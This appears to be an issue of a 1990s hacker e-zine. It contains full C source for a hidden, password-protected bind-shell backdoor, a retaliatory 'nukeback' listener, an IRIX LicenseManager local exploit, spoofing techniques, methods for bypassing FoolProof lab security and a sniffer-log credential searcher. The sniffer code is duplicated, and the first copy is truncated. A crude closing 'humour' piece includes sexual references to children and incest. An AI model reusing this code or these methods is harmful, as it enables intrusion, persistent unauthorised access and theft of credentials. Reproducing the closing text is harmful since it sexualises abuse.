[backdoor.c]-------------------------------------| jsbach | /* backdoor.c by jsbach@bear.cs.zorg.edu. that dup2() shit was ripped from pluvius@io.org. compiles fine on *BSD*, linux, and solaris (on solaris -lsocket) .. to hide the process i strcpy("", argv[count]);, making it invisible on solaris and pretty inconspicuous on BSD and linux. basically, this binds a program to a specified port and listens for a connection. when you exit the program, you DON'T get dropped to a shell, so you can let people bounce telnet connections off your box but not access anything else, or whatever. Example usage: ./backdoor /bin/sh 31337 p@55w0rd & or ./backdoor /bin/sh 31337 */ #define DATA "Hello. Please place semicolons after commands in shell mode :P\n---\n" #include #include #include #include int sockfd, count, clientpid, socklen, serverpid, temp, temp2,temp3; struct sockaddr_in server_address; struct sockaddr_in client_address; main(int argc, int **argv) { char password[ sizeof( argv[3] ) ]; char passwordchk[ sizeof( argv[3] ) ]; count=0; if (argc < 3) { printf("usage: %s program_to_run port_number password(optional)\n",argv[0]); exit(-1); } if (argc == 4) { strcpy((char *)&password, argv[3]); strcpy((char *)argv[3], ""); } printf("\n-----\nDaemon running %s on port %d. PID is %d.\n-----\n",argv[1], atoi(argv[2]), getpid()); sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); /*add error checking*/ bzero((char *) &server_address, sizeof(server_address)); strcpy((char *)argv[0],""); server_address.sin_family=AF_INET; server_address.sin_port=htons(atoi(argv[2])); strcpy((char *)argv[2],""); server_address.sin_addr.s_addr=htonl(INADDR_ANY); bind(sockfd, (struct sockaddr *)&server_address, sizeof(server_address)); listen(sockfd, 5); signal(SIGHUP, SIG_IGN); while(1) { socklen=sizeof(client_address); temp=accept(sockfd, (struct sockaddr *)&client_address,&socklen); if(argc == 4) { while(1) { write(temp, "Password: ", 10); read(temp, &passwordchk, sizeof(password)); if(strncmp(passwordchk, password, sizeof(password)) == 0) break; bzero(passwordchk,sizeof(passwordchk)); } } write(temp, DATA, sizeof(DATA)); if (temp < 0) exit(0); clientpid=getpid(); serverpid=fork(); if (serverpid != 0) { dup2(temp,0); dup2(temp,1); dup2(temp,2); execl(argv[1],argv[1],(char *)0); } close(temp); } } (15)------------SECURITY--------------------------------------(15) [Ip Spoofing]-------------------------------------| optiklenz | GENERAL: - System A tries to open a connection to system B. System B accepts the connection (or not) and sends back a response- the connection gets established and interact. - Requires trust between A and B. SOURCE-ROUTE: - System A wants to 'fake' one of your systems addresses to talk w/ system B (the address to be 'faked' is assumed trusted to B). The exact same thing happens as above except the first-hop gateway from system A has been set up to route YOUR netmask to system A and system A has been set up with the trusted address on your net. The other is that system A is 'source routing' (LSR if distant) to your net w/ the first-hop's address in the route, so when system B answers its buddy the trusted system, the packets are actually going to system A's first-hop and getting routed to system A. The fix is to disallow source-routing o'course. - Requires control of first-hop routing from A and that system B's net allows source-routing. SPOOF (DNS spoofing) - System A finds r* programs on system B and modifies the reverse DNS entries for system A to look like a system that B trusts. System A connects to system B, B looks up the DNS entry and gets back a host that B trusts. Easy, ugly. Fix is tcp-wrappers or replace r*'s. - Requires control of reverse DNS tables w/ system A's address and the default/stupid r* command daemons on system B. SPOOF (DNS spoofing w/ cache poison) - As above but system A 'volunteers' an IP address in an MX record to system B's DNS cache so that if tcp-wrappers are running the second lookup and compare w/ also succeed. SPOOF (IP level 'blind' spoofing): - System A shuts down the trusted host on your network via quirks in the implementations of TCP/IP (or waits for it to go down or whatever). System A sends a non-source-routed connect packet to system B using the trusted hosts's network address, just like the trusted host would have done if it were initiating a connection. System B sends out the response to it's buddy and it stays on the local subnet (why would it have any desire to leave ?). System A never gets the response, but the seq# guessing code doesn't care, it just guesses the next seq# in the chain of packets that system B would expect and pretends it has an open connection (which to system B it does, but system A has no way of really knowing that- thus, it (system A) is acting 'blind'). The point of the exercise is to send system B something that gives system A some kind of access/feedback. The fix, don't allow external packets into your network that have internal addresses. - Requires system B's net to allow external packets w/ internal addresses. GAINING TRUST RELATIONSHIP One fashion of accomplishing this would be setting up a circumstantial ralationship between system A, and system B in the main directory of system A create a .rhosts file echo B uid > ~/.rhosts, and the same on system B Same method goes for Sco Unix if you rlogin as root to a system via a trusted host (one which is in the etc/hosts.equiv)a passwd is not required VHOST vs SPOOFING I've seen various people on irc who beleive that because they are irc'ing with a vhost they are spoofed. That is definitly no the case. A Vhost (Virtual Host) is merely the ability for a machine to be a web server for multiple domains. vhost i;e advisory.legions.org <--[vhost] (16)------------SECURITY--------------------------------------(16) [Anal Sniff]-------------------------------------| chronic | download@ http://www.legions.org/chronic/sniff.c [Back Attack]-------------------------------------| chrak | /*compile: cc nukeback.c -o nukeback -Wall let it run like a shell script that nukes them back or something run on port 1 to stop portscanners quickly written by chrak*/ #include #include #include #include #include #include #include void main(int argc, char **argv) { int s_sock,c_sock,i; struct sockaddr_in s_info, c_info; char comline[66], *nuker; if(argc != 3) { printf("usage: %s port nuker\n", argv[0]); exit(EXIT_FAILURE); } s_sock = socket(AF_INET, SOCK_STREAM, 0); s_info.sin_family = AF_INET; s_info.sin_addr.s_addr = htonl(INADDR_ANY); s_info.sin_port = htons(atoi(argv[1])); bind(s_sock, (struct sockaddr *)&s_info, sizeof(s_info)); i = sizeof(c_info); listen(s_sock, 1); for(;;) { for(i=0;i<66;i++) comline[i] = '\0'; i = sizeof(c_info); c_sock = accept(s_sock, (struct sockaddr *)&c_info, &i); send(c_sock, "bleh?\n", 6, 0); close(c_sock); nuker = inet_ntoa(c_info.sin_addr); printf("Connect from %s\n", nuker); sprintf(comline, "%s %s", argv[2], nuker); printf("Doing %s\n", comline); system(comline); printf("Waiting for next bitch...\n"); } } (17)------------SECURITY--------------------------------------(17) [IRIX LMR]-------------------------------------| optiklenz | This is found to effect Irix 5.3, but is also vulnr on 6.1, and 6.2. This exploits license_eoe.sw.license_eoe. Note: LicenseManager is GUI used to license subsystem. This allows you to install, update , and remove FLEXlm and NET_LS licenses. Any user with access to X screen would be able to run it. $ setenv netls_lincense_file /.rhosts $ /usr/etc/LicenseManager (18)------------SECURITY--------------------------------------(18) [Securing Linux]-------------------------------------| BlackIC | This will explain some basic security mesures you can take after installing a linux system. This is based of a slackware install but the information should be good for other distributions also. First off, before you do anything you need to goto /etc/inetd.conf and take out all the services you dont need, for now comment them all out by adding a # in front of the line.If you plan to use telnet and ftp read the later chapter on securing those services. Now for changes to take effect type ps, get the pid of inetd and type kill -HUP inetd. Next you will want to goto /etc/rc.d/rc.inet2 and comment out the folowing lines. # Start the SUN RPC Portmapper. #if [ -f ${NET}/rpc.portmap ]; then # echo -n " portmap" # ${NET}/rpc.portmap #fi # # Start the various SUN RPC servers. if [ -f ${NET}/rpc.portmap ]; then # Start the NFS server daemons. if [ -f ${NET}/rpc.mountd ]; then echo -n " mountd" ${NET}/rpc.mountd Now if you plan on having users on your systems i recomend getting sshd installed for a more secure shell, you can read about it and download it at http://www.cs.hut.fi/ssh/. Also make sure you have the most current kernel (which of the time of this writing is 2.0.33), I also recomend getting the Rhino9 Linux Security Auditer Tool availible at rhino9.org, it will check for suid programs and other possible security holes, also if you are gonna give out shells make sure you trust these people, also update your passwords at least once a month or more and make sure there good passwords not like "god" "password1" "dog", some examples of good ones are "x3toyC34j8gg2", if your reading this that means you probaly have a newer distribution so it already has shadow passwords built in, i wouldnt recomend trying to install them if you dont, due to the fact i have seen a few people have big probs because of it. This guide was not meant to insure your security in any way, just because new exploits come out all the time, so keep yourself updated at cert.org or rootshell.com. also as a final note, your system will never be 100% secure, as no system is, so like um dont blame me if you get fucked over (19)------------SECURITY--------------------------------------(19) [FoolProof]-------------------------------------| Duncan Silver | In's and Out's of FoolProof control (not so foolProof after all) I thought long and relativelly hard about what my article is going to be about. Instead of bombarding you with yet another "l33t" article on vulnerabilities and things that have been written about over and over, I decided to bring you something new, and while it may not be as glamorous as some of the other topics I could have chose, at least it is completelly new, and unknown (to the best of my knowledge). Hope you find it usefull. - Duncan Silver -------------------------- What is Foolproof Control: FoolProof Control is a security program manufactured by SmartStuff Software, designed for windows 3.1, windows95, and MACOS. The purpose of this program is to restrict access to certain programs and devices (for example, default setup locks out access to hard drive, any preferences, options, etc.). This program is quite usefull (and widelly used) is public institutions like school's and library's. FoolProof is basically a simple TSR (terminate and stay resident) program, executed at the startup time (yes, in some cases it can be bypassed by ctrl+break during startup). The restricted access features are considered locked by the computer, and are simplly not available. To unlock the restricted features, you need to enter the password. ---------------------------- A word on FoolProof passwords: FoolProof priviledged users are divided into two categories: the users with access to all features, and users with access to FoolProof configuration itself. This simplly means that there are two means of authorization, first being clicking on the foolproof icon and entering the password (minimum of 6 charachters) which gives you access to foolproof configuration, and the second method being the hotkey. Now, I found hotkey feature to be quite interesting. You see, hotkey is set of 4 keys which need to be pressed at the same time. When this occurs, FoolProof is removed from the memory, enabeling all the features. You are free to do as you please, however you are still unable to configure foolproof or change the hotkey. After messing around with it for a long time (and installing some key loggers) I found that the hotkey always constitutes of CTRL+SHFT+two alphabet charachters. I'm not sure if this is only how they do it at the place where I tested it, or if this is a requirement. ----------------------------- Now that we have an idea of what it is, and what it does, we can move into the interesting part: defeating it. ----------------------------- Preamble: I spent quite some time messing around with FoolProof controll, and I have discovered a major flaw affecting all the versions released so far. I wrote to SmartStuff explaining this problem, and about a month later I recived mail from them stating that they have been "unable to reproduce the problem". It's quite obvious that their response is B.S, since I have exploited this vulnerability on several different sites. ---------------------------- Windows 95 + 3.1 DA FLAW: This is quite funny actually, but while messing around on one of these FoolProof protected machines, I came upon a wonderous idea. In the location window I entered: c:\. Needless I say the "protected" contents of the hardrive appeared before me. I am now able to execute any binary file simplly by clicking on it. However, I wanted more, I wanted to disable this FoolProof joke for good. It turns out that if you try to open autoexec, netscape will execute it, which does you no good. The way around this is to right click on the autoexec.bat file and then chose edit. Contents of autoexec are displayed in notepad, and after removing any references to foolproof, do the same thing with config.sys. After saving both files, simplly reboot. WHY oh WHY does this work? Well for the technicall part of it, foolproof restricts access to USERS, and when I typed c:\ in the netscape location window, the machine saw me as NETSCAPE instead of an USER. Same thing with saving autoexec.bat and config.sys to the drive, the foolproof thinks that netscape is trying to save these files, and since netscape is a program, it has any right to do whatever da fuck it wants to do. Pretty simple eh? ------------------------ Machintosh: Well, what can I say? I was never much of a Machintosh fan. Somebody went ahead of me in writting an article on defeating FoolProof for Machintosh, so the full credit for this section goes to tristan_durie@starbase.ca. 1. One way to disable FoolProof is to hold down the space bar when boot up the computer. The extensions Manager will then appear and you can then turn off the FoolProof Extension. (You can also just hold down the Shift key when you start up. This will turn of the Extensions. This only works when the admin of the computer has set up FoolProof so that it doesn't ask for a password to access the Hard Drive so using the Shift key doesn't usually work.) 2. Drag a folder (other than extensions folder) onto the launcher and it will then make an alias in the launcher items folder. You can then drag the FoolProof extension onto the alias of the folder on the launcher. This will move the FoolProof Extension into the folder. Restart the computer and the FoolProof extension will no longer be in the extensions folder and FoolProof will be disabled. (This methood is also useful for moving files around the Hard Drive when FoolProof disables dragging.) 3. Create a AppleScript program with a script like this: tell application "Finder" activate choose file copy the result to File1 choose folder copy the result to Folder1 move File1 to Folder1 end tell Run this script and choose the FoolProof Extension and then choose a folder other than the Extensions folder. Restart the computer and FoolProof should be disabled. 4. Run DropStuff and stuff the FoolProof Extension being sure to click the "delete file after stuffing" check box. Press OK and restart the computer after it has finished stuffing. The FoolProof Extension will be compressed so it won't work.(The original FoolProof extension was deleted because you checked the "delete file after stuffing" check box.) 5. If the get info command is disabled and you want to unlock something or change the memory allocation search for the file that you want to change using the FindFile. You can get info on files in window of FindFile. This is fairly useful for unlock the FoolProof Control Panel, preference or the FoolProof Extension because they lock every time you restart or open the FoolProof Control Panel. You can also use this method to replace the FoolProof extension, Control Panel or Preferences because you can't replace them if they are locked. (The older version of FoolProof allows you to move files into the trash and other folders using the FindFile.) 6. If you can run programs from a disk it is very simple to disable FoolProof. Make a program that deletes the FoolProof extension or you could use ResEdit to delete all the resources from the FoolProof extension and restart. 7. All of the settings for the FoolProof options are stored in the FoolProof preferences. You can change the settings by switching the preferences file with the one I have provided with this stack. Unfortunatly, the password is already set to one that I don't know but password protection is disabled. All the settings are disabled when you install this preference file. 8. If you can't run programs of disks but you can use documents you can create a Hypercard stack using hypercard externals that will delete the FoolProof Extension. You can then run this stack using Hypercard Player on the protected computer. ------------------------ One more stupid trick: Another stupid trick the "foolproof administrators" like to do is to disable only certain menu's of the applications. Let me give you an example: after deciding that we cannot have students running wherever they please on the internet, the administration bought membership to some gay-assed proxy server named Bess which restricts access to anything that could even remotelly be considered fun (no, I'm not talking about porn, you sick0's). Well, normally, we would start netscape, go to options menu select network preferences, and turn off the proxies and go about our business. FoolProof allowed admins to disable the options menu. To bypass this idiocy, simplly go to netscape mail, notice how a new window openes, containing all the menu's including options. Many times admins forget to disable these menus (well, actually all the time ;) So, that's another thing you might want to try. ------------------------- What FoolProof makers say about their product: "FoolProof Security, the most advanced version of the desktop security licensed on over one million school computers, is the market leader. FoolProof Security first began provide protection of systems and hard drives in 1993. The current version provides work groups with distinct privileges, including where users can save documents, program access, including internet programs and control of software downloaded from the internet." What I say about their product: "haha" -------------------------- Conclusion: In conclusion, FoolProof is an expensive piece of software that's definitelly not worth it. It's a piece of crap, and very easily defeated. If you are administrator planning to implement some security on dos or windows machines I recomend Fortress software. (20)------------MISC--------------------------------------(20) - { = - = M I S C = - = } - [56kpnp Linux]-------------------------------------| mosoka | This linux HOWTO examines the basic ways to setup your 56k compatible modem under the Linux operating system, how to get isapnptools to find and configure your modem correctly and also how to set other setting that are critical in your modem installation process. 1: Introduction The aim of this document, basically as stated above is to get your 56k modem to work in Linux. Modem installation under Linux in most cases aren't very complicated but its the new technology introduced with Windows 95 that has complicated matters. Such modems like Winmodems and modems that get configured using the Plug and Play method are the problem. Linux, currently has no Plug and Play support but their are some ways to get around it and hopefully by the end of this document everything will be working normally if not better then before. 2: Setting Up 2.1: What Modem Do You Have The first part of the solution is to become knowlegable with your modem and who makes its, model numbers, etc.. Some things that you should look out for are the following models: Winmodems and other modems that use Windows caching methods. If you have one of these models, stop reading this document and try and get your money back. Winmodems, as of yet, are uncompatible with Linux because of their methods of caching and setup. After you have found your model name and numbers you should take a visit to the homepage or bbs of your Linux distrubution company. In my case, I use OpenLinux so I would visit www.caldera.com. Most Linux companies have a list of compatible and uncompatible hardware for their distrubutions and thats what your looking for. The simplest method to finding this would be to search the site for your modem model and if it comes up as a hit under compatible hardware, your in luck. If by chance it come up in uncompatible hardware, you still may be able to get it working but it will take some time and a lot of work. If you were unable to find a compatible/uncompatible hardware list its allright, it isn't really important but you should still try and contact your Linux distrubution company by other means and try to find out if its compatible or not. 2.2: Doing Some Research The next part of setting up your modem is raid as many newsgroups and support archives you can to get a backround on your modem. You will be surprised at how many people are in the same situation as yourself. When I was tring to figure out how to configure my modem, I met some guy who was in the same situation and did try to offer some help but it didn't work probably due to the differences in our operating systems. A good place to check for your modem model is to go to www.metacrawler.com and search throught the newsgroups selection for your modem model. If you don't get that many hits searching the newsgroups you can all try "linux and " in the web search option. If your modem is not Plug and Play, skip down to Configuring Your Modem In Linux. 2.3: Downloading Files Allright, now that you know your modem you should be able to determine weather or not is Plug And Play or not. Now a days, most internal modems are Plug and Play and you will need to download a program called isapnptools in order to configure them. Isapnptools is the leading and currently the only Plug and Play configuration tool for the Linux operating system. It can be found at www.roestock.demon.co.uk/isapnptools/. At the time of this document, the latest version 1.13 and is available in many formats from tar gzip to rpm. Basically, thats the only file you will need. 2.4: Configuring Isapnptools Isapnptools comes with a tool called pnpdump which will scan your system for your Plug and Play device and find all the different ways it can be configured. Now is a good time to get out some paper and copy down some configurations cause you will need to write a config file next. From the information from pnpdump, you now must make a file called isapnp.conf. Basically, The stuff that you saw on your screen when your ran pnpdump and copied down on paper you will just need to put it in this file, so pick the best setup for your system that doesn't conflict with any other devices and start typing in your isapnp.conf file. For an example, here is my isapnp.conf file so you can see what i'm talking about: (READPORT 0x3bb) (ISOLATE) (IDENTIFY *) (CONFIGURE MOT1550/90238999 (LD 0 (IO 0 (BASE 0x3e8)) (INT 0 (IRQ 7 (MODE +E))) (ACT Y))) (WAITFORKEY) If your having trouble and don't understand you can formulate a config file from my example. First you can copy and paste the frist 3 lines and put them into your file. This will make a list of the Plug and Play devices you have installed. At this point, save your isapnp.conf file and run it. It will tell you the device name and serial numbers of the devices when you load up isapnp with your isapnp.conf file. Copy the device name and serial number off your screen and paste them into your isapnp.conf file in this format "(CONFIGURE (LD 0". In the next line, you need to decide what port you want to put your modem in. You should pick a port that obviously doesn't have anything in it or is configured in your linux. In my example, I'm using port com 3 which in hex is 0x3e8. If you want to use a different port, just change the hex address after the command "BASE". Lasty, you need to configure what irq your modem will use. In my example, I'm using irq 7. If you want to use a different one, like with the port address, just change the number after the command "IRQ". The last two lines of the config file are manditory and you should just copy and paste them in. Next, you need setup a program called setserial. To do this you should make a file called "modem" in your isapnptools directory and have it consist of the following: isapnp isapnp.conf setserial /dev/ttyS autoconfig setserial /dev/ttyS means that you should take the com port number where your modem is in and subtract one from it. For example, my modem is com 3 so I would use: "/dev/ttyS2". Save your "modem" file and make it executable by typing in: "chmod +x modem" and lastly, run it.. Now that your Plug and Play device is configured, you need to configure linux to the settings you just set to your modem. 2.5: Configuring Your Modem In Linux If you modem Plug and Play, you allready set it up to a com port and irq address but if its not, you need to open your computer up and set it up using dip switches or jumpers but if you allready set them for windows then you don't need to reset them. Next thing you need to do if your modem is Plug and Play or not, is go to your Linux setup program. For example, the Linux setup program in Openlinux is Lisa and in Slackware, its setup. In the setup program, configure Linux to the settings you set using isapnptools or the settings you set using your jumpers or dip switches. 3: Finished At Last 3.1: Thats It, Your Done Allright, Congratulations.. You have now setup your modem in linux. To use it, just use the device name of /dev/tty in communication programs like minicom or in ppp dialing scripts. I hope this faq was able to answer all your questions you had about setting up your 56k modem in linux and reached the goal of getting it to work.. (21)------------MISC--------------------------------------(21) /* sniffer log searcher,for quickly checking a sniffer log to see if theres any new entrys in it,by chrak*/ #include #include #include #include void main(int argc, char **argv) { int i, type = 0 , o = 0; /*type -t 1,-f 2,-tf 3,-r 4,-tr 5,-rf 6,-trf 7*/ char c[80], ignore[30]; FILE *fp1, *fp2; if(argc == 1) { printf("%s -l log -tfr -o out\n-l solsniffer log to open\n" "-t get telnets\n-f get ftps\n-r get rlogins\n-o out file" " - else stdout\n-i ignore string - ignores output with" " given string\n", argv[0]); exit(EXIT_FAILURE); } while((i = getopt(argc, argv, "l:o:i:tfr")) != -1) { switch(i) { case 'l' : printf("input: %s\n", optarg); if((fp1 = fopen(optarg, "r")) == NULL) { printf("Cant open file %s\n",optarg); exit(EXIT_FAILURE); } break; case 'o' : printf("output: %s\n", optarg); fp2 = fopen(optarg, "a"); o = 1; break; case 't' : printf("telnet\n"); type = 1+type; break; case 'f' : printf("ftp\n"); type = 2+type; break; case 'r' : printf("rlogin\n"); type = 4+type; break; case 'i' : printf("ignore: %s\n", optarg); strcpy(ignore, optarg); break; } } for(;;) { if((fgets(c, 80, fp1) == NULL)) break; if(strstr(c, ignore) == NULL) { if(type == 1 || type == 3 || type == 5 || type == 7) if(strstr(c,"(telnet)") != NULL) { if(o==1) fprintf(fp2, "%s", c); else printf("%s", c); } if(type == 2 || type == 3 || type == 6 || type == 7) if(strstr(c,"(ftp)") != NULL) { if(o==1) fprintf(fp2, "%s", c); else printf("%s", c); } if(type == 4 || type == 5 || type == 6 || type == 7) if(strstr(c,"(rlogin)") != NULL) { if(o==1) fprintf(fp2, "%s", c); else printf("%s", c); } } } fclose(fp1); (22)------------MISC--------------------------------------(22) [Sniff Log]-------------------------------------| chrak | /* sniffer log searcher,for quickly checking a sniffer log to see if theres any new entrys in it,by chrak*/ #include #include #include #include void main(int argc, char **argv) { int i, type = 0 , o = 0; /*type -t 1,-f 2,-tf 3,-r 4,-tr 5,-rf 6,-trf 7*/ char c[80], ignore[30]; FILE *fp1, *fp2; if(argc == 1) { printf("%s -l log -tfr -o out\n-l solsniffer log to open\n" "-t get telnets\n-f get ftps\n-r get rlogins\n-o out file" " - else stdout\n-i ignore string - ignores output with" " given string\n", argv[0]); exit(EXIT_FAILURE); } while((i = getopt(argc, argv, "l:o:i:tfr")) != -1) { switch(i) { case 'l' : printf("input: %s\n", optarg); if((fp1 = fopen(optarg, "r")) == NULL) { printf("Cant open file %s\n",optarg); exit(EXIT_FAILURE); } break; case 'o' : printf("output: %s\n", optarg); fp2 = fopen(optarg, "a"); o = 1; break; case 't' : printf("telnet\n"); type = 1+type; break; case 'f' : printf("ftp\n"); type = 2+type; break; case 'r' : printf("rlogin\n"); type = 4+type; break; case 'i' : printf("ignore: %s\n", optarg); strcpy(ignore, optarg); break; } } for(;;) { if((fgets(c, 80, fp1) == NULL)) break; if(strstr(c, ignore) == NULL) { if(type == 1 || type == 3 || type == 5 || type == 7) if(strstr(c,"(telnet)") != NULL) { if(o==1) fprintf(fp2, "%s", c); else printf("%s", c); } if(type == 2 || type == 3 || type == 6 || type == 7) if(strstr(c,"(ftp)") != NULL) { if(o==1) fprintf(fp2, "%s", c); else printf("%s", c); } if(type == 4 || type == 5 || type == 6 || type == 7) if(strstr(c,"(rlogin)") != NULL) { if(o==1) fprintf(fp2, "%s", c); else printf("%s", c); } } } fclose(fp1); if(o==1) fclose(fp2); } - { = - =C O M I C R E L I E F= - = } - With guest editor Analyzer [Young Hackers, and Jail]-------------------------------------[Analyzer] Greetings from the fighting grounds of israel. I am your guest editor for this month. Let me start off by introducing myself to those of you who have failed to notice my L33tness. I am Analyzer, and was born in Mymomsucksyouall israel. My nickname comes from many generations of seksi anal seks0rs. My mother died when I was 14 from an anal concussion I never thought that my little prick would end up killing her. Anyway after her death I was in shock so I started hanging on the net alot. And having sibor seks on irc in #young_child_sex where i felt welcome. Just when things were going ok, my goat humpry was bombed by the israel military I lubbed humpfry he was my only friend in the whole wide world after his death i took my anger out on the government not for killing a friend, but for killing a lover. Well Enough about my gay, and boring life. This all started when me, and a couple of friends got together to hax0r the goberment cause they wer fuckin un elite and shit and they killed humpfry so i was pissed you know? ok so me Juan Carlos, and Don Mexicano got together a family of over 100 immirgrants, and rented out a warehouse for our elite operation. Once things were set, and we taught the immirgrants our elite ways we started hacking away. The method i used is very complex and hard Here it is: ./statd url.gov Holy shit?!! you say?!? you'll never get it you say?!? well dont worry it took me months to figure it out and im fucken mad elite and shit Really it's nothing special we just sat there feeding government url's to a list and then we gained root. I guess the government is pretty fucken dumb because it took them 2 months to figure out how to use the tekniq 2 more days than it took me. Our attack was called the most systematic attack eber. (th4tz c4us3 w3 c4n typ3 a1l el8, 4n FuNky.) and because "statd" is what you call "anonymous".. Jail is really a bad bad thing I neber would eber go again. My first bad experience in jail was with what you americans call "soap" one day I was rubbin and scrubbin, and OOPSIE! the soap dropped so i bent down to pick it up, and for no reason my ass started moving back and forth and my hips side to side. I thought to myself "hrmmm", and kept looking for the soap the feeling really did'nt bug me at all I kinda liked it. Once I found the soap I stood, and heard a suction type sound coming from my ass it was funny, but my asshole wasn't hurting anymore so it really did'nt bug me. Then all of a sudden I was approached from behind. I guess in american network security you would call what happens next an "outside attack" I was forced to the ground, and then anal seks0red... After my shower I was assigned a cell block with my new cellmate Bubba. it was there where i was forced to perform oral sex "again" My dad had already taught me this method you americans call "giving head" infact I still have my dads teef marks on the tip of my pee pee, every day I look at it to remember the good times dad, and I had (those were the days). The morale of this story is that well if you go to jail you get screwed look the exterme close ups of my anus below ANAL SHOTS. (_|_) (_o_) ' BEFORE-JAIL AFTER JAIL ============================================================================= || Download Legions Text Files, and Zines at the following Boards: || ============================================================================= || Under The Influence...........(ALM)OST-HERE.............World HQ....... || || Narkotik Illusions............(303)PRI-VATE.............Midwestern HQ.. || || Exodus BBS....................(707)935-6867.............Distro Site.... || || Electric Rush (NuP)...........(707)257-7208.............Distro Site.... || ============================================================================= || Leave comments, Death Threats, ideas to webmaster@legions.org || ============================================================================= || Knowing what you cannot do is more important than knowing what you can. || =============================================================================